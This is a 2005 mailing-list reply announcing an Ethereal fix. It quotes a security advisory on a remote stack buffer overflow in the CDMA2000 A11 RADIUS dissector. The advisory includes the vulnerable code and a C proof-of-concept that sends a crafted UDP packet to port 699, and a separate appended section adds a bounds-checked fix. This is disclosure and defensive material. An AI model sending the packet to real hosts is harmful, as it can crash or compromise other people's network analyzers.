Re: Ethereal remote buffer overflow
Ethereal 0.10.10 will be released on Thursday, March 10. It will fix
this as well as two other security and stability-related issues. If you
need a fix immediately, you can download source tarballs and Windows
installers from
http://www.ethereal.com/distribution/buildbot-builds/
LSS Security wrote:
> LSS Security Advisory #LSS-2005-03-04
> http://security.lss.hr
>
> ---
>
> Title : Ethereal remote buffer overflow
> Advisory ID : LSS-2005-03-04
> Date : 08.03.2005
> Advisory URL : http://security.lss.hr/en/index.php?page=exp
> Impact : Stack overflow and possible code execution
> Risk level : High
> Vulnerability type : Remote
> Vendors contacted : Yes
>
> ---
>
>
>
>
> ===[ Overview
>
> Ethereal is used by network professionals around the world for troubleshooting,
> analysis, software and protocol development, and education. It has all of the
> standard features you would expect in a protocol analyzer, and several
> features not seen in any other product. Its open source license allows talented
> experts in the networking community to add enhancements. It runs on all popular
> computing platforms, including Unix, Linux, and Windows.
>
>
>
> ===[ Vulnerability
>
> There is a remote buffer overflow vulnerability in the Ethereal dissector for
> CDMA2000 A11 packets. The vulnerability is located in the dissect_a11_radius()
> function in packet-3g-a11.c, used for RADIUS authentication dissection. The
> number of bytes that will be copied from the packet to a buffer on the stack is
> taken from the packet itself. 16 bytes are reserved for that buffer, and the
> string length can be up to 256 bytes (unsigned char), so it is possible to
> overflow local variables and the return address.
>
>
> packet-3g-a11.c:
> ----------------
> #define MAX_STRVAL 16
> ...
> dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
> {
> ...
> size_t radius_len;
> ...
> guchar str_val[MAX_STRVAL];
> ...
> radius_len = tvb_get_guint8(tvb, offset + 1);
> ...
> strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2);
> ...
> }
> ----------------
>
> A similar vulnerability was also found in the same function a few lines below,
> where RADIUS attributes are copied to the stack.
>
> packet-3g-a11.c:
> ----------------
> #define MAX_STRVAL 16
> ...
> dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
> {
> ...
> guint attribute_len;
> ...
> guchar str_val[MAX_STRVAL];
> ...
> attribute_len = tvb_get_guint8(tvb, offset + radius_offset + 1);
> ...
> case ATTR_TYPE_STR:
> strncpy(str_val,tvb_get_ptr(tvb,offset+radius_offset+2,attribute_len - 2), attribute_len - 2);
>
> ...
> }
> ----------------
>
>
>
> ===[ Affected versions
>
> All versions since the 3G-A11 dissector was added to CVS, including the latest, 0.10.9.
> The vulnerability was tested with the latest Ethereal on Linux and Windows.
>
>
>
> ===[ Fix
>
> It seems that they fixed that vulnerability just a few days ago, and a new
> version will probably be available soon from http://www.ethereal.com.
>
>
>
> ===[ PoC Exploit
>
> The exploit is in the attachment, and at the URL http://security.lss.hr/en/PoC/
>
>
>
> ===[ Credits
>
> Credit for this vulnerability goes to Leon Juranic.
>
>
>
> ===[ LSS Security Contact
>
> LSS Security Team, <eXposed by LSS>
>
> WWW : http://security.lss.hr
> E-mail : security@xxxxxx
> Tel : +385 1 6129 775
>
>
>
>
>
>
> ------------------------------------------------------------------------
>
> /*
> *
> * Ethereal 3G-A11 remote buffer overflow PoC exploit
> * --------------------------------------------------
> * Coded by Leon Juranic <ljuranic@xxxxxx>
> * LSS Security <http://security.lss.hr/en/>
> *
> */
>
> #include <stdio.h>
> #include <string.h>
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <netdb.h>
>
>
> int main (int argc, char **argv)
> {
> int sock;
> struct sockaddr_in sin;
> unsigned char buf[1024];
> char bla[200];
>
> sock=socket(AF_INET,SOCK_DGRAM,0);
>
> sin.sin_family=AF_INET;
> sin.sin_addr.s_addr = inet_addr(argv[1]);
> sin.sin_port = htons(699);
>
> buf[0] = 22;
> memset(buf+1,'A',19);
> buf[20] = 38;
> *(unsigned short*)&buf[22] = htons(100);
> *(unsigned short*)&buf[28] = 0x0101;
> buf[30] = 31;
> buf[31] = 150; // len for overflow...play with this value if it doesn't work
>
> memset (bla,'B',200);
> strncpy (buf+32,bla,180);
>
> sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
> return 0;
> }
>
>
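Added example, not from the advisory or the Ethereal source tree: a bounds-checked replacement for the quoted strncpy pattern, showing the checks the copy needed (including the unsigned wrap when the packet's length byte is below 2) and a constructed-input probe that exercises them. The function names and the [type][length][value] attribute layout are assumptions for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_STRVAL 16   /* same stack buffer size as the quoted dissector */

/* Hardened replacement for the quoted strncpy pattern (an assumed fix for
 * illustration, not the project's own patch). attr points at an attribute laid
 * out as [type][length][value...], where length counts the two header bytes,
 * the radius_len / attribute_len convention from the advisory; avail is the
 * number of packet bytes remaining from attr. On success str_val holds the
 * NUL-terminated value; on any malformed input nothing is written. */
bool copy_str_attr_safe(const uint8_t *attr, size_t avail, char str_val[MAX_STRVAL])
{
    if (avail < 2)
        return false;               /* not even type + length present */
    size_t attr_len = attr[1];      /* untrusted, packet-controlled */
    /* The original computes radius_len - 2 on an unsigned value: a length of 0
     * or 1 wraps to a huge copy count instead of failing. Reject it first. */
    if (attr_len < 2 || attr_len > avail)
        return false;               /* underflow, or claims bytes the packet lacks */
    size_t val_len = attr_len - 2;
    if (val_len >= MAX_STRVAL)
        return false;               /* would overrun str_val or leave no room for NUL */
    memcpy(str_val, attr + 2, val_len);
    str_val[val_len] = '\0';
    return true;
}

/* Builds a constructed attribute (not captured traffic) with the given claimed
 * length, filled with 'B', hands the first avail bytes to the hardened copy,
 * and returns the length of the value copied, or -1 if it was rejected. */
int probe(uint8_t claimed_len, size_t avail)
{
    uint8_t attr[256];
    char out[MAX_STRVAL];
    if (avail > sizeof attr)
        avail = sizeof attr;
    memset(attr, 'B', sizeof attr);
    attr[0] = 1;                    /* arbitrary attribute type */
    attr[1] = claimed_len;
    return copy_str_attr_safe(attr, avail, out) ? (int)strlen(out) : -1;
}
```

The count passed to a bounded copy must derive from the destination's size, not from a value read out of the packet; strncpy with a count larger than the destination still writes the full count.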